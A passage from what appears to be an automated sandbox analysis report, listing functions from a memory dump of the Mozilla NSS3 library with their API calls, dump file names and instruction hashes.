                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7106A0: EnterCriticalSection.KERNEL32(?), ref: 6C7106D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7106A0: PR_Unlock.NSS3 ref: 6C7106EB
                                                                                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C6FDFBF
                                                                                                                                                                                                                                                                                          • CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C6FDFDB
                                                                                                                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C6FDFFA
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6FE029
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3183882470-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                                                          • Instruction ID: f994cc110d8f8592fced795adc799150fbe7f3e912580dce1437292d9c3f3f1f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7112F71A04206ABEB105EA95C44FEB7A7AAF8135CF040534E938C7B00E736D83796E9
                                                                                                                                                                                                                                                                                          Function 6C718DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 08021e2e4ec3ee4c3144936b5dc9edc3c4446d1631006203535a6ff44cdd4a9b
                                                                                                                                                                                                                                                                                          • Instruction ID: ef3bfe585ffbca3692b647612ac26949cdc1f6a7c9547a6290f76515186a9067
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08021e2e4ec3ee4c3144936b5dc9edc3c4446d1631006203535a6ff44cdd4a9b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3118F756096009BD740BF78D54815ABBF4FF05318F46492ADC88D7B01E734E854CBC2
                                                                                                                                                                                                                                                                                          Function 6C79AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C785F17,?,?,?,?,?,?,?,?,6C78AAD4), ref: 6C79AC94
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C785F17,?,?,?,?,?,?,?,?,6C78AAD4), ref: 6C79ACA6
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C78AAD4), ref: 6C79ACC0
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C78AAD4), ref: 6C79ACDB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5cab2f990db9d42e310319bdf014ed8042e47e33a8834f6812c2f8a4cb895d40
                                                                                                                                                                                                                                                                                          • Instruction ID: b5846afceb40ea3aeb3a23808ea12a4431668981b945f3535efcfb5c99be63c1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cab2f990db9d42e310319bdf014ed8042e47e33a8834f6812c2f8a4cb895d40
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E70140B1A02B019BD760EF29EA09753B7E8BF05669B104839D85AD7A00E731E458CBD1
                                                                                                                                                                                                                                                                                          Function 6C701DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C701DFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F95B0: TlsGetValue.KERNEL32(00000000,?,6C7100D2,00000000), ref: 6C6F95D2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F95B0: EnterCriticalSection.KERNEL32(?,?,?,6C7100D2,00000000), ref: 6C6F95E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F95B0: PR_Unlock.NSS3(?,?,?,?,6C7100D2,00000000), ref: 6C6F9605
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C701E09
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PR_EnterMonitor.NSS3(?,?,6C6FE175), ref: 6C6FE19C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PR_EnterMonitor.NSS3(6C6FE175), ref: 6C6FE1AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PR_ExitMonitor.NSS3 ref: 6C6FE208
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PL_HashTableRemove.NSS3(?), ref: 6C6FE219
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6FE231
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6FE249
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6FE190: PR_ExitMonitor.NSS3 ref: 6C6FE257
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C701E37
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C701E4A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 499896158-0
                                                                                                                                                                                                                                                                                          • Opcode ID: bf9060d34afbebd62e1bd7da76f5ea7c0a1ca8f844ae3937188b0c5d36e1f552
                                                                                                                                                                                                                                                                                          • Instruction ID: ee52ccf93704a6aa830fce4898639a4839e2ed5fb636e73cdef4a17ce56d39da
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf9060d34afbebd62e1bd7da76f5ea7c0a1ca8f844ae3937188b0c5d36e1f552
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F01F2B1B0015097EB104E29ED08F4A77F9AB52B4EF600030E928A7B91E771E818CBD2
                                                                                                                                                                                                                                                                                          Function 6C701D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C701D75
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C701D89
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C701D9C
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C701DB8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 939066016-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6bd4630be5d83add2084e09400331426ddf726de0d45ff71af240aba0c09d973
                                                                                                                                                                                                                                                                                          • Instruction ID: f0ac1abdbea50587130b639abd7c0a5d4b17eacfe30446d5212632064b6ee4be
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bd4630be5d83add2084e09400331426ddf726de0d45ff71af240aba0c09d973
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40F0D1F2B0161057EF205E19AE47B8736D8AB81A9CF200235E9198BF41DA60E808C3E2
                                                                                                                                                                                                                                                                                          Function 6C74FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6F9003,?), ref: 6C74FD91
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(A4686C75,?), ref: 6C74FDA2
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C75,?,?), ref: 6C74FDC4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?), ref: 6C74FDD1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2335489644-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 44468b43b33cc27add73d71cb569d991c2b7efefd913feb34f9cb96df9cd5c28
                                                                                                                                                                                                                                                                                          • Instruction ID: 1d60393c522eedc1babaad0014035b0709cd9e39a4f49c869d2bf3fcea7f5447
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44468b43b33cc27add73d71cb569d991c2b7efefd913feb34f9cb96df9cd5c28
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F0FCF2A012025BEB005F55DE959177758EF8529DB14C035ED198BB02E721D814CBE2
                                                                                                                                                                                                                                                                                          Function 6C80CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2988086103-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 72aca74088d1b7588e4d7f083647c8d3e080b8b1921109246d2ee12585ca1f34
                                                                                                                                                                                                                                                                                          • Instruction ID: cd280380a7851390ffc72be09d126232e28f733ffa1cdf3854af0f3ae8e17f2a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72aca74088d1b7588e4d7f083647c8d3e080b8b1921109246d2ee12585ca1f34
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E030B6700608ABCA10EFA9DC4488677ACEE492783154535E691C3701D231F905CBE1
                                                                                                                                                                                                                                                                                          Function 6C6E9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_value_text.NSS3 ref: 6C6E9E1F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C672352,?,00000000,?,?), ref: 6C6A1413
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A13C0: memcpy.VCRUNTIME140(00000000,R#gl,00000002,?,?,?,?,6C672352,?,00000000,?,?), ref: 6C6A14C0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • ESCAPE expression must be a single character, xrefs: 6C6E9F78
                                                                                                                                                                                                                                                                                          • LIKE or GLOB pattern too complex, xrefs: 6C6EA006
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                                                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                                                                          • API String ID: 2453365862-264706735
                                                                                                                                                                                                                                                                                          • Opcode ID: 8b8066ef26ab72050b508df54c9915c9bcbbfcaa8d4419da426c7cab0ac124e5
                                                                                                                                                                                                                                                                                          • Instruction ID: dcfa322c551434761f44266c6f0bc87adf9eb362e1612b0ac5ba6155816d8206
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8066ef26ab72050b508df54c9915c9bcbbfcaa8d4419da426c7cab0ac124e5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D810A71A0E2554BDB10CF29C0803E9B7F2AF4931CF28C65AD8A48BB85D735D887C795
                                                                                                                                                                                                                                                                                          Function 6C744D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C744D57
                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C744DE6
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                                                          • String ID: %d.%d
                                                                                                                                                                                                                                                                                          • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                                                          • Opcode ID: 750057772bcb846a15467ae3acf69dd6f850435f4b8c7ecc790f937a2dcbbdd7
                                                                                                                                                                                                                                                                                          • Instruction ID: 0c8aa85adc0273d12b288ac4f642bbef21705b09b073c06a4924d863658d2b31
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 750057772bcb846a15467ae3acf69dd6f850435f4b8c7ecc790f937a2dcbbdd7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE312CB2D042186BEB209FA19D0ABFF776CEF45308F054429ED159B781EB349909DBE1
                                                                                                                                                                                                                                                                                          Function 6C764CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3('8vl,00000000,00000000,?,?,6C763827,?,00000000), ref: 6C764D0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7508B4
                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C764D22
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C6F1A3E,00000048,00000054), ref: 6C74FD56
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                                                                                          • String ID: '8vl
                                                                                                                                                                                                                                                                                          • API String ID: 1521942269-196612016
                                                                                                                                                                                                                                                                                          • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                          • Instruction ID: 74004d4c7010adb673bd40585f841f0bd88aa62d00889451d71c820f320d20ce
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF06832E0112457DB108D6BDE55B4336DC9B417BDF1402B1DE18CBB81E731DC049691
                                                                                                                                                                                                                                                                                          Function 6C78AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C78AF78
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6EACE2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: malloc.MOZGLUE(00000001), ref: 6C6EACEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C6EAD02
